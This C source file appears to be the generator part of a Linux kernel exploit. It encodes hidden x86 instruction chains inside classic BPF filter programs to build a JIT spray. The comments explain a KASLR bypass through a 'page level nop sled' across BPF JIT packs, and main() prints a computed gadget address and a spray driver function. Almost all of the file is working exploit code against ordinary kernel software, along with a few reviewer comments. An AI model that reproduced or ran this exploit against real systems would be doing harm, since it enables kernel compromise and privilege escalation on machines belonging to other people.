	// At the top of the stack is the return address now, so we can simply create
	// a frame here (we would corrupt rbx and r13 but that is fine for the loop)
	offsets[j++] = push_rbp();
	offsets[j++] = push_rsp();
	offsets[j++] = pop_rbp();

	// Finally, write the payload. This terminates our chain and we continue
	// with the normal bpf instructions afterwards
	// Note that this injects another instruction:
	//     add byte ptr [rax], al
	// Since rax is a valid pointer this does not matter. But we corrupt some of
	// the written payload. (Which is not a problem though because we skipped the
	// initial bytes anyway)
	offsets[j++] = __fnsave_RAX();

	insn_i = __encode_offsets(filter, insn_i, filter_len, offsets, j, RET, NULL);

	fprintf(stderr, "[payload] num insn = %d\n", insn_i);
	*filter_len = insn_i;
}

// Build the sprayed "page level nop sled" image (padded to exactly one page
// by __fill_to_size): part I calls 8 pages + 0xee ahead, part II fixes up
// the call's return address and materializes 0x1000 in r8d, part III is the
// per-page ret slide. Parts II and III are interleaved into one jump-chain
// encoding via hole_opts. See the long comment below for the full picture.
static void prepare_bpf_jit_nop_sled(struct sock_filter* filter, unsigned* filter_len) {
	unsigned insn_i = 0;

	unsigned j = 0;
	u32 offsets[0x1000] = {};
	u32 offsets2[0x100] = {};

	// Bypassing KASLR:
	// in arch/x86/kernel/module.c:
	// Offset is in [1, 1024] * 0x1000 = [0x1000, 0x400'000]
	//
	// Bpf jit images are allocated from the "pack allocator" (basically another
	// simple layer on top of module_alloc).
	// One pack is of size 2MB = 0x200'000 (assuming 1 numa node)
	//
	// The module_alloc allocator is rather simple (backed by vmalloc), returning
	// contiguous memory pages. One slight issue is that it emits guard pages
	// after each (pack) allocation.
	//
	// We need to fill two packs to exhaust the entire range.
	// Thus we will generate two valid chain payloads, all fitting into one pack.
	// This avoids the guard page problem, but slightly decreases our success chances
	// (assuming we have full control each pack, which can be achieved by exhausting
	// the previous "dirty" pack until it is empty):
	// One pack = 512 * 0x1000, we need 4.5 pages for the final payload image +
	// 1.5 pages for the final nop sled image and can fill the remaining
	// 512-6 = 506 pages with the nop sled image.
	// Our initial image needs at least 8 pages of padding _before_ the final
	// sled image thus we need to hit any of the prior 497 images.
	// With two images we get 497*2 / (1024 + 2 /*guard pages*/) ~ 97% success chance.
	//
	// To visualize, each <> of size 512 pages (1 pack), G representing a guard page:
	// :[random offset]<   pad   >|< slide 1 >G|< slide 2 >|< ...   >G
	// ^                                               ^
	// |                                               |
	// base address                                    last possible page that works
	//                                                 assuming random offset = 1,
	//                                                 this is our gadget address
	//
	// General idea:
	// - Generate 1-page sized images which form a "page level nop sled"
	//
	// To start it off, call 8 pages ahead with a chain like this (part I):
	// neg eax    		f7 d8
	// shr $1,%eax		d1 e8
	// jmp (0x80-S)		e9 80 00 00 00
	//
	// which gets interpreted as
	// ..
	// d8 d1         		fcom st(1)
	// e8 e9 80 00 00		call +0x80ee
	//
	// Now we have a 8-page + 0xee hole after which we can transplant a 1page jump chain
	// with rets, something like this (part III):
	//
	// add dword [rsp], 0x1000
	// pop scratch
	// push scratch
	// push scratch
	// ret
	//
	// Now this is actually not _that_ simple. Because of the random offset the kernel
	// adds to each image we cannot simply trust the return address of the injected
	// call when doing page-increments.
	// To overcome this, we add another intermediate payload which adds a small-ish
	// offset to this return address once (part II). After that we continue with the
	// ret sled outlined above.
	//
	// To visualize, we try to achieve the following:
	//
	// [ IMAGE 0x0000 ] (size = 0x1000)
	//   0  : call IMAGE +0x8000 + A
	//   ..
	//   A  : add B to [rsp] (i.e. return address)
	//        push [rsp]
	//        ret
	//   ...
	//   A+B: add 0x1000 to [rsp] (i.e. return address)
	//        push [rsp]
	//        ret
	// [ IMAGE 0x1000 ] (size = 0x1000)
	//   0  : call IMAGE +0x8000 + A
	//   ..
	//   A  : add B to [rsp] (i.e. return address)
	//        push [rsp]
	//        ret
	//   ...
	//   A+B: add 0x1000 to [rsp] (i.e. return address)
	//        push [rsp]
	//        ret
	//
	// ...
	//
	// [ IMAGE 0x8000 ] (size = 0x1000)
	//   0  : call IMAGE +0x8000 + A
	//   ..
	//   A  : add B to [rsp] (i.e. return address)
	//        push [rsp]
	//        ret
	//   ...
	//   A+B: add 0x1000 to [rsp] (i.e. return address)
	//        push [rsp]
	//        ret
	//
	// ...
	//
	// Now suppose our initial guess hits IMAGE 0x0000. This will call into payload
	// part II or IMAGE 0x8000. At this point the return address is basically
	// IMAGE 0x0000 + 0. Now the second payload will adjust this return address
	// to IMAGE 0x0000 + B. Then we _return_ and hit part III of the previous
	// IMAGE 0x0000 + A+B, which then continues to slide through IMAGE 0x?000 + A+B
	//
	// (actually part II will already add one page to the payload but you get the
	// idea)
	//
	// Because of the random offsets at the start of each image, 0, A, A+B are all
	// padded with nop slides themselves.
	//

	// part I: Call into the "page nop sled" to get a instruction pointer on the stack

	// add nop sled
	insn_i = __add_image_nop_sled(filter, insn_i, filter_len);

	// .. ends with
	// neg eax    		f7 d8

	// shr $1,%eax		d1 e8
	OP(BPF_ALU | BPF_RSH | BPF_K, 1);

	// jmp (0x80-5)		e9 80 00 00 00
	unsigned jmp_i = insn_i;
	OP(BPF_JMP | BPF_JA, 0);

	// encode the offset of 0x80
	// 6 * DIV + 2 * STX
	_Static_assert(6 * insn_lengths[DIV] + 2 * insn_lengths[STX] == 0x80, "invalid offset");
	OP(BPF_ALU | BPF_DIV | BPF_K, 0x11111111);
	OP(BPF_ALU | BPF_DIV | BPF_K, 0x11111111);
	OP(BPF_ALU | BPF_DIV | BPF_K, 0x11111111);
	OP(BPF_ALU | BPF_DIV | BPF_K, 0x11111111);
	OP(BPF_ALU | BPF_DIV | BPF_K, 0x11111111);
	OP(BPF_ALU | BPF_DIV | BPF_K, 0x11111111);
	OP(BPF_STX, 0);
	OP(BPF_STX, 0);
	// patch the BPF jump to skip the 0x80 filler bytes emitted above
	filter[jmp_i].k = insn_i - jmp_i - 1;

	// Fix alignment of call
	_Static_assert(insn_lengths[SHL] == 3, "invalid offset");
	OP(BPF_ALU | BPF_LSH | BPF_K, 2);

	// Fill up with nops. This is the hole that the call above jumps over in
	// addition to the 8 pages (this is placed here for the image that is hit
	// by the call)
	for (j = 0; j < (0xee - 0x80 - insn_lengths[SHL]) / insn_lengths[NEG]; j++)
		OP(BPF_ALU | BPF_NEG, 0);

	// part II: the callee 8 pages ahead

	// How long does the nop sled need to be for the next payload?
	// We have max 56 bytes random slide from kernel.
	// Assuming image which executed the call has slide length 0 and the image hit
	// has slide length 56 we will hit the hole above (of size > 56), so nothing
	// required.
	// In the other extreme, call would hit 56 bytes after the hole so we need
	// another nop sled like in the beginning
	for (j = 0; j < 28; j++)
		OP(BPF_ALU | BPF_NEG, 0);

	// Now the actual payload which is hit by the call. This payload will move
	// 0x1000 into r8d and add a small offset to the return address which
	// emulates the hole similar to the call, only that it widens the hole up
	// the final "page nop sled" payload.

	//
	// NOTE: Caution when editing the chain below. It was designed with some fiddling
	// around making the encoding possible within 1 page (see also notes below)
	//

	j = 0;

	// first get a known value into r8d. we only have _or_ and _add_ so here we are ..
	// eax = -1
	offsets[j++] = mov_eax_0xe90000XX(0x01);
	offsets[j++] = sub_eax_0xe90000XX(0x02);

	// [rsp] = -1
	offsets[j++] = push_rax();

	// rax = rsp
	offsets[j++] = push_rsp();
	offsets[j++] = pop_rax();

	// r8d = -1
	offsets[j++] = or_r8d_RAX();

	// clean up [rax]
	offsets[j++] = pop_rax();

	// eax = 8
	offsets[j++] = mov_eax_0xe90000XX(0x09);
	offsets[j++] = sub_eax_0xe90000XX(0x01);

	// [rsp] = 8
	offsets[j++] = push_rax();

	// rax = rsp
	offsets[j++] = push_rsp();
	offsets[j++] = pop_rax();

	// add/add ping-pong between r8d and [rax] to grow towards 0x171 / 0x1000
	offsets[j++] = add_r8d_RAX(); // r8d = 00000007 [rax] = 00000008
	offsets[j++] = add_RAX_r8d(); // r8d = 00000007 [rax] = 0000000f
	offsets[j++] = add_r8d_RAX(); // r8d = 00000016 [rax] = 0000000f
	offsets[j++] = add_RAX_r8d(); // r8d = 00000016 [rax] = 00000025
	offsets[j++] = add_r8d_RAX(); // r8d = 0000003b [rax] = 00000025
	offsets[j++] = add_RAX_r8d(); // r8d = 0000003b [rax] = 00000060
	offsets[j++] = add_RAX_r8d(); // r8d = 0000003b [rax] = 0000009b
	offsets[j++] = add_r8d_RAX(); // r8d = 000000d6 [rax] = 0000009b
	offsets[j++] = add_r8d_RAX(); // r8d = 00000171 [rax] = 0000009b
	offsets[j++] = add_RAX_r8d(); // r8d = 00000171 [rax] = 0000020c

	// now we add the small offset to the return address before continuing
	// preserve [rax], next address is the return address
	offsets[j++] = pop_rdx();

	// duplicate return address, now [rax] = return address,
	offsets[j++] = pop_rbp();
	offsets[j++] = push_rbp();
	offsets[j++] = push_rbp();

	// add the small offset (5 * 0x171)
	// (we choose this because of alignment requirements and it being a reasonable
	//  value for the part III offset)
	offsets[j++] = add_RAX_r8d();
	offsets[j++] = add_RAX_r8d();
	offsets[j++] = add_RAX_r8d();
	offsets[j++] = add_RAX_r8d();
	offsets[j++] = add_RAX_r8d();

	// restore original [rax] value
	offsets[j++] = pop_rbp();
	offsets[j++] = push_rdx();

	offsets[j++] = add_r8d_RAX(); // r8d = 0000037d [rax] = 0000020c
	offsets[j++] = add_RAX_r8d(); // r8d = 0000037d [rax] = 00000589
	offsets[j++] = add_RAX_r8d(); // r8d = 0000037d [rax] = 00000906
	offsets[j++] = add_RAX_r8d(); // r8d = 0000037d [rax] = 00000c83
	offsets[j++] = add_r8d_RAX(); // r8d = 00001000 [rax] = 00000c83

	// now r8d is 0x1000 and ready to be used by the nop sled
	// increment return address by another full page and start sliding
	offsets[j++] = pop_rdx(); // tmp
	offsets[j++] = push_rbp(); // new return address
	offsets[j++] = add_RAX_r8d();

	// duplicate return address to mimic a call
	offsets[j++] = pop_rbp();
	offsets[j++] = pop_rdx(); // original return address, do not need anymore
	offsets[j++] = push_rbp();
	offsets[j++] = push_rbp();

	offsets[j++] = ret();

	// part III: The "nop sled". At this point rax = rsp + 8, r8d = 0x1000
	unsigned j2 = 0;
	// duplicate the return address
	offsets2[j2++] = pop_rbp();
	offsets2[j2++] = push_rbp();
	offsets2[j2++] = push_rbp();

	// jump 1 page forward
	offsets2[j2++] = add_RAX_r8d();

	// duplicate return address to mimic a call
	offsets2[j2++] = pop_rbp();
	offsets2[j2++] = pop_rdx(); // original return address, do not need anymore
	offsets2[j2++] = push_rbp();
	offsets2[j2++] = push_rbp();

	offsets2[j2++] = ret();

	// So in order to make the whole payload fit into 1 page we do an interleaved
	// encoding of the two jump chains.
	// The two chains were designed together so that the first one has a rather
	// long hole at the end which we target for the encoding.
	// This is hole encoding is best effort and is likely not going to work for
	// arbitrary interleaving payloads.
	struct hole_opts hole = HOLE_INIT(500 /*generous padding nop slide*/, offsets2, j2);
	insn_i = __encode_offsets(filter, insn_i, filter_len, offsets, j, RET, &hole);

	// Now pad to the full page to ensure alignment between images
	insn_i = __fill_to_size(filter, filter_len, insn_i, 0x1000);

	fprintf(stderr, "[nop sled] num insn = %d\n", insn_i);
	*filter_len = insn_i;
}

/*
 * Build the final slide image of the jit spray.
 *
 * Unlike the regular slide images (prepare_bpf_jit_nop_sled), this image must
 * also cancel the offset that the preceding slide added to the call return
 * address, so that the real payload image gets the maximum usable space.
 *
 * filter     - output buffer for the classic BPF instructions
 * filter_len - in: capacity of filter; out: number of instructions emitted
 *
 * NOTE(review): the OP() macro is not visible in this chunk; from usage it
 * appears to append one instruction to `filter` and advance `insn_i` — confirm
 * against its definition.
 */
static void prepare_bpf_jit_nop_sled_final(struct sock_filter* filter, unsigned* filter_len) {

	// The final image needs to jump out of the slide and undo the added offset back to
	// the original one in order to allow maximum space for the real payload
	// We added 5*0x171 to the call return address for the slide.
	// So simply increase this images size to cancel this out (+- some alignment,
	// but we can increase the nop sled in the payload image a bit to make up for
	// that)

	// we need to match the slide of the previous image (56) + call instruction (5+2encoding) +
	// offset added to the call return address (5*0x171).

	unsigned insn_i = 0;
	// First ret, get it out of the way... See X86_FEATURE_RETHUNK
	OP(BPF_RET | BPF_A, 0);

	// Pad with an encoding map sized to cancel the accumulated offset:
	// 5*0x171 (return-address increments) + 7 (call insn + encoding), minus
	// the length of the leading ret just emitted.
	// NOTE(review): `insn_lengths[FIRST_RET]` is presumably a runtime value,
	// making `tmp` a VLA; ISO C forbids initializing a VLA, so `= {}` here
	// relies on a compiler extension (GCC/Clang) — TODO confirm toolchain.
	struct map_entry tmp[5 * 0x171 + 7 - insn_lengths[FIRST_RET]] = {};
	ASSERT(find_minimal_encoding(tmp, LEN(tmp), false));
	insn_i = __encode_translate_map(tmp, LEN(tmp), filter, filter_len, insn_i);

	// slide to both sides
	for (int i = 0; i < 56*2 + 5 /*just to be sure*/; i++)
		OP(BPF_ALU | BPF_NEG, 0);

	// now the same return logic of the previous slide images again
	unsigned j = 0;
	u32 offsets[0x100] = {};

	// duplicate the return address
	offsets[j++] = pop_rbp();
	offsets[j++] = push_rbp();
	offsets[j++] = push_rbp();

	// jump 1 page forward
	offsets[j++] = add_RAX_r8d();

	// duplicate return address to mimic a call
	offsets[j++] = pop_rbp();
	offsets[j++] = pop_rdx(); // original return address, do not need anymore
	offsets[j++] = push_rbp();
	offsets[j++] = push_rbp();

	offsets[j++] = ret();

	insn_i = __encode_offsets(filter, insn_i, filter_len, offsets, j, MOD, NULL);

	// blow up size to roughly match desired offsets:
	insn_i = __fill_to_size(filter, filter_len, insn_i, 0x1000 + 0x171 * 5 + 7);

	fprintf(stderr, "[nop sled final image] num insn = %d\n", insn_i);
	*filter_len = insn_i;
}

/*
 * Emit (on stdout) a page-sized padding filter plus the number of copies
 * needed to round the currently partially-filled bpf jit pack out to a whole
 * pack (512 pages). Also reports via *offset how many bytes of pack-sized
 * address space the padding sprays consume in total.
 *
 * space_taken - bytes already allocated in the last bpf jit pack
 * offset      - out: total byte span covered by the padding packs
 *
 * Note: the local names `filter`, `insn_i` and `filter_len` are referenced
 * implicitly by the OP() macro and must keep these exact names.
 */
static void dump_bpf_jit_padding_to_full_pack(unsigned space_taken, unsigned long* offset) {
	struct sock_filter filter[512] = {};
	unsigned capacity = 512;
	unsigned* filter_len = &capacity;
	unsigned insn_i = 0;

	// Leading ret, get it out of the way. See X86_FEATURE_RETHUNK
	OP(BPF_RET | BPF_A, 0);

	unsigned filled_pages = space_taken / 0x1000;
	unsigned packs_to_fill = filled_pages / 512 + 1; /* we fill at least one pack */
	*offset = (unsigned long)packs_to_fill * 0x1000 * 512;
	filled_pages = filled_pages % 512; /* pages used inside the current pack */

	// jit payloads are always at least one page, so padding only needs to
	// plug the page-sized holes
	insn_i = __fill_to_size(filter, filter_len, insn_i, 0x1000);

	printf("struct sock_filter filter_padding[] = {\n");
	unsigned i = 0;
	while (i < insn_i) {
		PRINT_FILTER(filter[i]);
		i++;
	}
	printf("};\n");
	printf("const unsigned n_filter_padding = %u;\n", 512 - filled_pages);
}

/*
 * Generate the spray payload source: prints the three filter programs
 * (slide, final slide, payload) plus the pack padding and the computed
 * gadget address as compilable C on stdout.
 */
int main(int argc, char* argv[]) {
	#define PROG_LEN 0x1000
	struct sock_filter filter[PROG_LEN] = {};
	unsigned len = PROG_LEN;

	parse_opts(argc, argv);

	prepare_bpf_jit_nop_sled(filter, &len);
	printf("struct sock_filter filter_nop_sled[] = {\n");
	for (unsigned i = 0; i < len; i++) {
		PRINT_FILTER(filter[i]);
	}
	printf("};\n\n");

	len = PROG_LEN;
	prepare_bpf_jit_nop_sled_final(filter, &len);
	printf("struct sock_filter filter_nop_sled_final[] = {\n");
	for (unsigned i = 0; i < len; i++) {
		PRINT_FILTER(filter[i]);
	}
	printf("};\n\n");

	len = PROG_LEN;
	prepare_bpf_jit_payload(filter, &len);
	printf("struct sock_filter filter_payload[] = {\n");
	for (unsigned i = 0; i < len; i++) {
		PRINT_FILTER(filter[i]);
	}
	printf("};\n\n");

	unsigned long offset;
	dump_bpf_jit_padding_to_full_pack(bpf_jit_pack_space_taken, &offset);

	// see comments in prepare_bpf_jit_nop_sled()
	// FIX: align module_alloc_space_taken UP to the next page boundary.
	// The previous mask `& 0xFFF` kept only the low 12 bits, i.e. computed
	// (x + 0xFFF) mod 0x1000 instead of rounding up; align-up is
	// (x + 0xFFF) & ~0xFFF.
	unsigned long gadget = 0xffffffffc0000000
		+ ((module_alloc_space_taken + 0xFFF) & ~0xFFFul)
		+ offset
	#ifndef NOKASLR_DEBUG
		+ 0x1000 /* 1 page is guaranteed to be added as random offset */
	#endif
		+ (512 + 1 /*guard page*/ + 497) * 0x1000 /* end of valid range with minimal offset */
		+ 84 /* bypass random per-image slide */
		+ 8 /* pack header */
		+ 1 /* break alignment */;
	printf("unsigned long gadget = 0x%016lxull;\n\n", gadget);

	// Emit the spray driver: fill the partial pack, then spray two packs of
	// slide images terminated by the final slide and the payload image.
	printf("int gadget_do_spray(void) {\n"
		"	int count = 0;\n"
		"	#define __do_spray(x) do {\\\n"
		"		count++; \\\n"
		"		if (spray_one_filter(x, sizeof(x) / sizeof(x[0])) < 0) \\\n"
		"			return -1;\\\n"
		"		} while (0)\n"
		"	for (unsigned i = 0; i < n_filter_padding; i++)\n"
		"		__do_spray(filter_padding);\n"
		"	for (int n = 0; n < 2; n++) {\n"
		"		for (int i = 0; i < 512 - 2 - 4; i++)\n"
		"			__do_spray(filter_nop_sled);\n"
		"		__do_spray(filter_nop_sled_final);\n"
		"		__do_spray(filter_payload);\n"
		"	}\n"
		"	return count;\n"
		"}\n");

	return 0;
}
